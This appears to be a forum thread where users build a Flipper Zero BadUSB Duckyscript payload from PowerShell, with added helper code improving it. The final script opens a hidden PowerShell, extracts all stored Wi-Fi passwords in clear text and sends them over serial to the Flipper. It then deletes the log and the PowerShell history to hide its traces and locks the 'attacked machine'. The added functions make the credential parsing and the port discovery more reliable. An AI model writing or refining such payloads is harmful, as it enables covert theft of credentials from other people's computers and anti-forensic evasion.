Need help converting Powershell code to Duckyscript

Hi all,

I’m re-using some PowerShell scripts for my BadUSB on the Flipper. Problem is that many of these have advanced statements in them. Since I’m not good at writing code, I could use some help please!

How to convert this block to a one-liner:

$wlanKeys = netsh wlan show networks |ForEach-Object {
    if ($_ -match '^SSID \d+\s*:\s*(.*)$') {
        $ssidName = $Matches[1]
        netsh wlan show profile "name=`"${ssidName}`"" key=clear |ForEach-Object {
            if ($_ -match 'Key Content\s*:\s*(.*)$') {
                [pscustomobject]@{
                    Name = $ssidName
                    Key = $Matches[1]
                }
            }
        }
    }
}

I could do this manually, but we have great work from @Zarcolio here in the forum.
Try this one: What do you use the bad usb for? - #8 by Zarcolio

Edit: Not exactly what you asked for, but will work as BadUSB.


Lets see what we have.

All goes into one variable $wlanKeys … Why? It would make sense if you add a Write-Host $wlanKeys below. Else the variable will vanish when the session is closed.

netsh wlan show networks # Lets start with this one.

Going through all objects with | ForEach-Object { } can be cut to | % { } … But you could already use |select-string here and avoid the if: |select-string ":.*[a-zA-Z0-9-_]+"

And cut out the interesting part (profile name):
|%{"$_".split(":")[1].trim()}

and for the last step, the output of each profile (the name is quoted so SSIDs containing spaces still work):
|%{netsh wlan show profile "name=`"$_`"" key=clear}

netsh wlan show profiles |select-string ":.*[a-zA-Z0-9-_]+" |%{"$_".split(":")[1].trim()} |%{netsh wlan show profile "name=`"$_`"" key=clear}

My only Windows system is at home, so I can’t test if this will work for real. But I think with the explanation someone can debug the rest.
For example, the output part could be improved. I can’t do that without seeing the actual format.

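As an added example (editor's code, not from anyone in this thread), here is the same pipeline split into small functions that parse netsh text, so the regexes can be tried offline. The netsh output below is constructed to mimic an English Windows install; netsh is localized, so the "All User Profile" and "Key Content" labels are an assumption on non-English systems, and "Key Content" is only printed for secured profiles when the shell is elevated. SSIDs with spaces are kept intact by quoting the name the same way the original post does.

```powershell
# Added example: parse 'netsh wlan show profiles' / 'netsh wlan show profile ... key=clear'
# into objects. Labels assume English netsh output; sample text below is constructed.

function ConvertFrom-NetshProfileList {
    param([string[]]$Lines)
    # Profile lines look like "    All User Profile     : Home WiFi".
    # Capture everything after the colon (lazily, trailing blanks dropped) so
    # SSIDs containing spaces survive; header and separator lines do not match.
    foreach ($line in $Lines) {
        if ($line -match '^\s*All User Profile\s*:\s*(.+?)\s*$') {
            $Matches[1]
        }
    }
}

function ConvertFrom-NetshProfileDetail {
    param([string]$Name, [string[]]$Lines)
    # 'Key Content' is absent for open networks and when not running elevated,
    # so Key stays $null in those cases instead of the function throwing.
    $key = $null
    foreach ($line in $Lines) {
        if ($line -match '^\s*Key Content\s*:\s*(.*?)\s*$') { $key = $Matches[1] }
    }
    [pscustomobject]@{ Name = $Name; Key = $key }
}

function Get-WlanKeys {
    # Live variant for a real host: shells out to netsh, quoting the profile
    # name so 'Home WiFi' is passed as one argument (same idiom as the thread).
    @(ConvertFrom-NetshProfileList (netsh wlan show profiles)) | ForEach-Object {
        $detail = netsh wlan show profile "name=`"$_`"" key=clear
        ConvertFrom-NetshProfileDetail -Name $_ -Lines $detail
    }
}

# --- constructed sample input (mimics English netsh output) ---
$sampleList = @(
    'Profiles on interface Wi-Fi:',
    '',
    'Group policy profiles (read only)',
    '---------------------------------',
    '    <None>',
    '',
    'User profiles',
    '-------------',
    '    All User Profile     : Home WiFi',
    '    All User Profile     : CoffeeShop'
)
$sampleDetail = @(
    'Profile Home WiFi on interface Wi-Fi:',
    '',
    'Security settings',
    '-----------------',
    '    Authentication         : WPA2-Personal',
    '    Cipher                 : CCMP',
    '    Security key           : Present',
    '    Key Content            : correct horse battery'
)

$names = @(ConvertFrom-NetshProfileList $sampleList)
ConvertFrom-NetshProfileDetail -Name $names[0] -Lines $sampleDetail | Format-Table -AutoSize
# On a real host, run Get-WlanKeys from an elevated PowerShell to see live results.
```

The offline part exercises only the parsing; Get-WlanKeys is the function to drop into a script in place of the one-liner, and because it returns objects you can pipe it to Export-Csv or Out-String instead of dumping raw netsh text into a transcript.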

Ah perfect! Here is my result:

# The script will get the WiFi details
# Then it will store the details in C:\Users\MyName\Log.txt
# Then send it to the Flipper in folder /ext/apps_data/WiFiKeys_$env:computername.txt
# Then delete the Log.txt from the attacked machine
# Then clear its traces and lock the PC
# Credits to the entire internet, this code is a mix of a few scripts like I_am_Jakoby

GUI r

DELAY 200

STRING cmd

ENTER

DELAY 200

STRING powershell -NoP -NonI -W Hidden

ENTER

DELAY 500

STRING $SSID = (get-netconnectionProfile).Name;

STRING $PASSPHRASE = $(netsh wlan show profiles |select-string ":.*[a-zA-Z0-9-_]+" |%{"$_".split(":")[1].trim()} |%{netsh wlan show profile "name=`"$_`"" key=clear});

STRING Start-Transcript -Path "$home\Log.txt";

STRING netsh.exe wlan show interface;

STRING write-output $PASSPHRASE;

STRING Stop-Transcript;

ENTER

DELAY 200

STRING CD $home

ENTER

STRING $d=(Get-Content Log.txt|Out-String);

STRING $BHID="HID\\VID_046D\&PID_C529";

STRING $SUSB="USB\\VID_0483\&PID_5740";

STRING $SPATH="/ext/apps_data/WiFiKeys_$env:computername.txt"

ENTER

DELAY 500

REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.

STRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};

ENTER

DELAY 1000

STRING Remove-Item -Force -Path $home\Log.txt

ENTER

REM ------- remove PowerShell history while PowerShell is still open (this probably won't be enough to remove all traces of you, this is just to prevent initial investigations)

STRING Remove-Item (Get-PSReadlineOption).HistorySavePath

ENTER

REM ------- exit PowerShell, then exit cmd

STRING exit

ENTER

STRING exit

ENTER

REM ------ lock the PC

GUI l
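The script above finds the Flipper's COM port by taking one character after "COM" in the Get-PnpDevice output, which breaks for COM10 and above. As an added example (editor's code, not from the thread's author), here is the same discovery done by hardware ID with the port number taken from the device's FriendlyName, plus the Flipper CLI write sequence the script uses (`storage write <path>`, the data, then Ctrl+C). The FriendlyName format "USB Serial Device (COMn)" is an assumption based on the standard usbser driver; the VID/PID is the one already used in the script.

```powershell
# Added example: locate the Flipper CDC port robustly and push a file over its CLI.
# Assumes the Flipper enumerates as USB\VID_0483&PID_5740 with a FriendlyName
# like "USB Serial Device (COM12)" (standard usbser naming).

function Get-ComPortNumber {
    # Pull the number out of "USB Serial Device (COM12)"; $null when absent.
    param([string]$FriendlyName)
    if ($FriendlyName -match '\(COM(\d+)\)') { [int]$Matches[1] } else { $null }
}

function Find-FlipperPort {
    # Match on InstanceId so another USB-serial adapter is never picked by mistake.
    $dev = Get-PnpDevice -PresentOnly -Class Ports -ErrorAction SilentlyContinue |
        Where-Object { $_.InstanceId -like 'USB\VID_0483&PID_5740*' } |
        Select-Object -First 1
    if ($dev) { Get-ComPortNumber $dev.FriendlyName }
}

function Send-FlipperFile {
    param([int]$Port, [string]$RemotePath, [string]$Content)
    $p = New-Object System.IO.Ports.SerialPort("COM$Port", 115200, 'None', 8, 'One')
    $p.Open()
    try {
        # Flipper CLI: 'storage write <path>' then reads the port until Ctrl+C (0x03).
        $p.Write("storage write $RemotePath`r`n")
        $p.Write($Content)
        $p.Write([string][char]3)
    } finally {
        $p.Close()
    }
}

# Offline check of the parser with constructed FriendlyName strings.
Get-ComPortNumber 'USB Serial Device (COM12)'
Get-ComPortNumber 'Communications Port (COM1)'
Get-ComPortNumber 'Some device without a port'

# Usage on a real host: the Flipper only shows up as a serial device once BadUSB
# has finished, so poll for it the same way the script's 600-iteration loop does.
# $port = $null
# foreach ($i in 1..600) { $port = Find-FlipperPort; if ($port) { break }; Start-Sleep 1 }
# if ($port) { Send-FlipperFile -Port $port -RemotePath '/ext/apps_data/test.txt' -Content 'hello' }
```

Find-FlipperPort returns $null instead of throwing when the device is not present, which is what a polling loop wants; the try/finally makes sure the port is released even if the write fails halfway, so the next iteration can reopen it.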

I don’t think the $SSID will help if there are more than one stored WLAN.
I remember the 600 loops ‘hack’ from somewhere :wink:


Will release this Duckyscript Script.
Thanks
